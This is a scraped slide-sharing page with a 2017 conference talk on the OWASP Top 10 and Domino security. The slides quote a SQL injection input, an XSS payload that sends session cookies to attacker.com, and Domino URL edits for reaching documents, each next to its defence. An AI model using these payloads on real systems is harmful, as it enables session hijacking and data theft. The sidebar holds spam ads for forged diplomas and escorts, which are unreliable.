 
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitDecember OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitHoward Greenberg
 
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1Howard Greenberg
 
OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020Howard Greenberg
 
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchAugust Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchHoward Greenberg
 
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!Howard Greenberg
 
OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020Howard Greenberg
 
Dev112 let's calendar that
Dev112   let's calendar thatDev112   let's calendar that
Dev112 let's calendar thatHoward Greenberg
 
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...Howard Greenberg
 

More from Howard Greenberg (20)

January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12
 
BRPA November Meeting
BRPA November MeetingBRPA November Meeting
BRPA November Meeting
 
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
 
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
 
August OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedAugust OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub Explained
 
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoJuly OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
 
June OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerJune OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification Manager
 
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best PracticesApril, 2021 OpenNTF Webinar - Domino Administration Best Practices
April, 2021 OpenNTF Webinar - Domino Administration Best Practices
 
OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021
 
February OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesFebruary OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for Newbies
 
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveJanuary OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
 
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitDecember OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
 
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
 
OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020
 
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchAugust Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
 
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
 
Open ntf 2020-jun
Open ntf 2020-junOpen ntf 2020-jun
Open ntf 2020-jun
 
OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020
 
Dev112 let's calendar that
Dev112   let's calendar thatDev112   let's calendar that
Dev112 let's calendar that
 
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
 

Recently uploaded

Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfStefano Stabellini
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noidabntitsolutionsrishis
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesŁukasz Chruściel
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
How to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfHow to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfLivetecs LLC
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....kzayra69
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)jennyeacort
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odishasmiwainfosol
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceBrainSell Technologies
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作qr0udbr0
 

Recently uploaded (20)

Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdf
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New Features
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
How to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfHow to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdf
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. Salesforce
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作
 

MWLUG 2017: Lessons on Domino Security from the OWASP Top 10

  • 1. MWLUG 2017 Moving Collaboration Forward Can Domino Be Hacked? Lessons We Can Learn From the Security Community Howard Greenberg Andrew Pollack
  • 2. MWLUG 2017 Moving Collaboration Forward Our Amazing Sponsors
  • 3. MWLUG 2017 Moving Collaboration Forward Andrew Pollack Northern Collaborative Technologies • Administrator & Developer since version 2.0 • IBM Lotus Beacon Award Winner • Services – Security Review & Penetration Testing – Site Performance & Security Reviews – Expert Witness & Security Forensics – Application Development – Administrative Overhaul • Products – NCT Search – NCT Compliance Search – NCT Simple Sign On – NCT SAML for Domino 7+ • Structural Firefighter
  • 4. MWLUG 2017 Moving Collaboration Forward Howard Greenberg • Been doing Notes/Domino since 1993 – Developer, Admin, Consultant, Instructor • Co-founded TLCC in 1998 – Self-paced courses for Notes/Domino and XPages • Security Certifications – Certified Information Systems Auditor (CISA) – Certified Information Security Manager (CISM) • Certified Flight Instructor (CFI)
  • 5. MWLUG 2017 Moving Collaboration Forward Session Goals • Review the OWASP Top 10 Web Application Security Issues • Relate those to our Domino environments HG
  • 6. MWLUG 2017 Moving Collaboration Forward Why do I care? • I have a firewall, no one can touch my Domino environment! HG
  • 7. MWLUG 2017 Moving Collaboration Forward Reality Vendors Suppliers Customers Employees HG
  • 8. MWLUG 2017 Moving Collaboration Forward Major Breaches • Target – 70MM customer accounts – Stole logins from the HVAC subcontractor • Via phishing email, then malware got installed – Once in, pivoted to registers, installed malware • Captured credit card information, then uploaded to hackers – Lesson learned, segment networks, encrypt sensitive data Did the Firewall help? https://www.sans.org/reading- room/whitepapers/casestudies/case-study-critical-controls- prevented-target-breach-35412 HG
  • 9. MWLUG 2017 Moving Collaboration Forward OPM Breach • Office of Personnel Management (US) – Personal data on EVERY Federal employee • Plus more... • Phishing attack – got login data from a contractor – put malware on admin server • Lack of encryption on sensitive databases https://www.wired.com/2016/10/inside-cyberattack-shocked- us-government/ HG
  • 10. MWLUG 2017 Moving Collaboration Forward Who/What is OWASP • “Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software” • Publishes a list of the 10 Most Critical Web Application Security Risks – Widely Respected – For each Risk it provides: • A description • Example vulnerabilities • Example attacks • Guidance on how to avoid • References to OWASP and other related resource https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project HG
  • 11. MWLUG 2017 Moving Collaboration Forward Top 10 for 2017 (Release Candidate) • A1-Injection • A2-Broken Authentication and Session Management • A3-Cross-Site Scripting (XSS) • A4-Broken Access Control • A5-Security Misconfiguration • A6-Sensitive Data Exposure • A7-Insufficient Attack Protection • A8-Cross-Site Request Forgery (CSRF) • A9-Using Components with Known Vulnerabilities • A10-Underprotected APIs HG https://www.owasp.org/index.php/Top_10_2017-Top_10
  • 12. MWLUG 2017 Moving Collaboration Forward Sample of Information Published Link to PDF HG
  • 13. MWLUG 2017 Moving Collaboration Forward A1 - Injection The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query.. Typically SQL injection, got any sql code in your apps (accessing relational data)? like: String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; the attacker modifies the ‘id’ parameter value in her browser to send: ' or '1'='1. For example: http://example.com/app/accountView?id=‘ or '1'='1 This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures HG
  • 14. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A1 • Got SQL code? – Use SQL parameters “SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'" "SELECT * FROM accounts WHERE custID= ?” – Scrub input – use prepared statements HG
  • 15. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A1 • Hack Domino urls – Switch from openDocument to editDocument http://www.tlcc.com/mwlug/mwlug2017.nsf/topicThread.xsp?documentId=557D7B9 B86441DFF85258154004A827A&action=openDocument • Pivot to read all documents – open default view http://www.tlcc.com/mwlug/mwlug2017.nsf/$defaultview • Use zero as the view and open any document by id http://www.tlcc.com/mwlug/mwlug2017.nsf/0/ 557d7b9b86441dff85258154004a827a?EditDocument Fix - use proper reader/author names Block view access with $$ViewTemplateDefault HG
  • 16. MWLUG 2017 Moving Collaboration Forward A2-Broken Authentication and Session Management - What is it? • User authentication credentials aren’t properly protected when stored using hashing or encryption. • Credentials can be guessed or overwritten through weak account management functions • Session IDs are exposed in the URL • Session IDs are vulnerable to session fixation attacks. • Session IDs don’t timeout, or user sessions or authentication tokens aren’t properly invalidated during logout. • Session IDs aren’t rotated after successful login. • Passwords, session IDs, and other credentials are sent over unencrypted connections. AP
  • 17. MWLUG 2017 Moving Collaboration Forward A2-Protecting Stored Credentials • Domino is fairly good at this if you let it – Use Minimum Password Requirements – Protect your Domino Directory – Don’t store a password file “just in case” – Use the “Fewer Name Variants” option • Beware of SSO Solutions – Including SAML – You may be turning over all authentication controls to some other system! AP
  • 18. MWLUG 2017 Moving Collaboration Forward A2 – Weak Management Practices • Beware of password recovery processes – How do you verify the person requesting the password reset is really the person who should have it? This can also be used to deny service. – Any web site that can send you your old password when you request it should not be trusted AP
  • 19. MWLUG 2017 Moving Collaboration Forward A2 – Session IDs in the URL • While Domino doesn’t generally do this, some administrators do this to avoid creating Domino users, or to give specific user content within applications based on URLs – E.G. Urls that contain specific invoice numbers or trouble ticket ids to send users to specific documents AP
  • 20. MWLUG 2017 Moving Collaboration Forward A2 – Session “Fixation” Attacks • Can your stored authentication token be captured an re-used in Domino? – Spoiler Alert: Yes, it can – and quite easily • In Session based authentication the session token is stored in a cookie. • Anyone who can create web pages on your server can capture this using a bit of javascript. – Other servers – including non-Domino servers within your domain may be able to capture this cookie as well AP
  • 21. MWLUG 2017 Moving Collaboration Forward A2 – Preventing Domino “Fixation” attacks on your Domino Servers • Code review applications • Follow XSS prevention best practices • Change the default cookie domain path in your session ltpa token documents AP
  • 22. MWLUG 2017 Moving Collaboration Forward A2 – Passwords, session IDs, on unencrypted connections • There should no longer be any reason to allow unencrypted http connections at all. Sorry. It’s 2017. Stop doing this. AP
  • 23. MWLUG 2017 Moving Collaboration Forward A3 - Cross Site Scripting (XSS) You are vulnerable to Server XSS if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have Client XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs, but escaping (and to a lesser extent) input validation can be used to make this safe. Example Attack Scenario The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; The attacker modifies the ‘CC’ parameter in his browser to: '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'. This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. HG
  • 24. MWLUG 2017 Moving Collaboration Forward Domino Vulnerability – A3 • YES, any web application is!!! • Any text input, especially rich text (converts to link) • Prevention – Always sanitize any input • Domino web – look for html tags, strip out – Have to roll your own with LotusScript – Note: CSJS is not an option! • XPages have HTML Filters HG
  • 25. MWLUG 2017 Moving Collaboration Forward XPages HTML Filters • XPages has built-in filtering • Have to turn on – HTMLFilter – for output – HTMLFilterIn – filters on saving • Use acf as the option! – Identity does nothing, empty kills everything – Turn on for all rich text (server, app, or XPage) xsp.richtext.default.htmlfilter=acf HG More Information!
  • 26. MWLUG 2017 Moving Collaboration Forward A4-Broken Access Control • Not just ACL Settings – but includes them – Maximum Internet Name & Password Access – Anonymous & Default “No Access” on all database you don’t expect web users to access – Obscurity is not Security – (See App Dev Practices) AP
  • 27. MWLUG 2017 Moving Collaboration Forward A5-Security Misconfiguration • Don’t expose your operating system to the internet. • Turn off all services you don’t need • Keep your Domino version fully up to date – Tools like “Metasploit” know all about Domino – Out of date servers can be hacked to a remote command line in 30 seconds with menu driven hacking tools AP
  • 28. MWLUG 2017 Moving Collaboration Forward A5 – Use Good HTTP Password Management practices • Assign HTTP Passwords even if you don’t use them. This field will get filled in with garbage if you do not. – These are also used to attack your SMTP mail handler AP
  • 29. MWLUG 2017 Moving Collaboration Forward A5 – Don’t Help the Hackers • By default your server tells the world what software you’re running. It’s like you WANT to get hacked AP
  • 30. MWLUG 2017 Moving Collaboration Forward A5 – Don’t Help the Hackers! • HTTPDisableServerHeader=1 • Then Get Fancy! Add your own SERVER header AP
  • 31. MWLUG 2017 Moving Collaboration Forward A5 - Set up SSL the right way • Use TLS • Use the right SSL settings • Use a score check service to validate AP www.ssllabs.com/ssltest/index.html
  • 32. MWLUG 2017 Moving Collaboration Forward A5 – Domino Web Server Settings May need to modify ciphers available Disable_SSLV3=1 SSL_USE_CLIENT_CIPHER_ORDER=1
  • 33. MWLUG 2017 Moving Collaboration Forward A6- Sensitive Data Exposure Am I vulnerable to Data Exposure? The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data: 1. Is any of this data stored in clear text long term, including backups of this data? 2. Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous. 3. Are any old / weak cryptographic algorithms used? 4. Are weak crypto keys generated, or is proper key management or rotation missing? 5. Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser? HG
  • 34. MWLUG 2017 Moving Collaboration Forward Domino Vulnerability – A6 Know your data, what is sensitive - RISK ANALYSIS! • HTTPS should be turned on/forced for anything that may be sensitive - protect data in motion • Store data in encrypted fields protect data when sitting – Notes encryption (field level), now in XPages in FP8! • Use TLS 1.2 only, older encryption is vulnerable – Turn off SSLV3 • Passwords in names.nsf – setting to hash in better encrypted ways • PCI - If your company takes credit cards, you are subject to PCI • PII - personal information, many rules for EU, states, etc. HG
  • 35. MWLUG 2017 Moving Collaboration Forward A7 - Insufficient Attack Protection Am I Vulnerable to Attack? Detecting, responding to, and blocking attacks makes applications dramatically harder to exploit yet almost no applications or APIs have such protection. Critical vulnerabilities in both custom code and components are also discovered all the time, yet organizations frequently take weeks or even months to roll out new defenses. It should be very obvious if attack detection and response isn’t in place. Simply try manual attacks or run a scanner against the application. The application or API should identify the attacks, block any viable attacks, and provide details on the attacker and characteristics of the attack. If you can’t quickly roll out virtual and/or actual patches when a critical vulnerability is discovered, you are left exposed to attack.AP
  • 36. MWLUG 2017 Moving Collaboration Forward A7-Insufficient Attack Protection • Is anyone monitoring your HTTP and SMTP logs to look for attacks? • Does your company have an IDS (Intrusion Detection System)? • Fail2Ban – Poor Linux Admin’s IDS AP
  • 37. MWLUG 2017 Moving Collaboration Forward A8 - Cross-Site Request Forgery (CSRF) Am I Vulnerable to CSRF? To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests. An alternate defense is to require the user to prove they intended to submit the request, such as through reauthentication. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets. Multistep transactions are not inherently immune. Also be aware that Server- Side Request Forgery (SSRF) is also possible by tricking apps and APIs into generating arbitrary HTTP requests. Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t defend against CSRF since they are included in the forged requests. HG
  • 38. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A8 • Prevent your content from being rendered in an iframe or frameset that you did not generate. • Domino web admin is vulnerable, turn off! • Domino frameset – DominoValidateFramesetSRC=1 - make sure the content in the frameset comes from the same database https://www- 10.lotus.com/ldd/dominowiki.nsf/dx/DominoValidateFramesetSRC • Set header - (note required for PCI compliance) http://www-01.ibm.com/support/docview.wss?uid=swg21568598 HG
  • 39. MWLUG 2017 Moving Collaboration Forward A8 – X-Frame-Options Header • Use the header “X-Frame-Options” to tell browsers not to allow your page to be loaded in someone else’s frame – Frequently required by customer security audits AP
  • 40. MWLUG 2017 Moving Collaboration Forward A9 - Using Components with Known Vulnerabilities • The challenge is to continuously monitor the components (both client-side and server-side) you are using for new vulnerability reports. This monitoring can be very difficult because vulnerability reports are not standardized, making them hard to find and search for the details you need (e.g., the exact component in a product family that has the vulnerability). Worst of all, many vulnerabilities never get reported to central clearinghouses like CVE and NVD. • Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. This process can be done manually, or with automated tools. If a vulnerability in a component is discovered, carefully evaluate whether you are actually vulnerable. Check to see if your code uses the vulnerable part of the component and whether the flaw could result in an impact you care about. Both checks can be difficult to perform as vulnerability reports can be deliberately vague. HG
  • 41. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A9 • What software is your application using? Does that have vulnerabilities? – JS libraries like jQuery, Select2 – Java libraries (pdf, JSON, credit card...) • What software is IBM using? (Example Java libraries, Apache struts, etc.) – Example: Apache Struts vulnerability – Be sure to keep the Domino JVM updated – Interim fixes – Latest Fix PackHG
  • 42. MWLUG 2017 Moving Collaboration Forward A10 – Under-protected APIs Am I Vulnerable to Attack? Testing your APIs for vulnerabilities should be similar to testing the rest of your application for vulnerabilities. All the different types of injection, authentication, access control, encryption, configuration, and other issues can exist in APIs just as in a traditional application. However, because APIs are designed for use by programs (not humans) they frequently lack a UI and also use complex protocols and complex data structures. These factors can make security testing difficult. The use of widely-used formats can help, such as Swagger (OpenAPI), REST, JSON, and XML. Some frameworks like GWT and some RPC implementations use custom formats. Some applications and APIs create their own protocol and data formats, like WebSockets. The breadth and complexity of APIs make it difficult to automate effective security testing, possibly leading to a false sense of security. Ultimately, knowing if your APIs are secure means carefully choosing a strategy to test all defenses that matter. HG
  • 43. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A10 • Know what is turned on in your applications and server. – Is Domino DAS turned on? • REST access to a database – XPages REST, agents that serve up REST data, etc. • Do a Code review, understand what data these might serve up and how much access is given. HG
  • 44. MWLUG 2017 Moving Collaboration Forward Closing • Security is the responsibility of EVERYONE • Especially those of us in IT, even without a security job – Developers have to ALWAYS design for security – Admins have to ALWAYS plan and monitor to build resilient systems – Management has to provide the resources and focus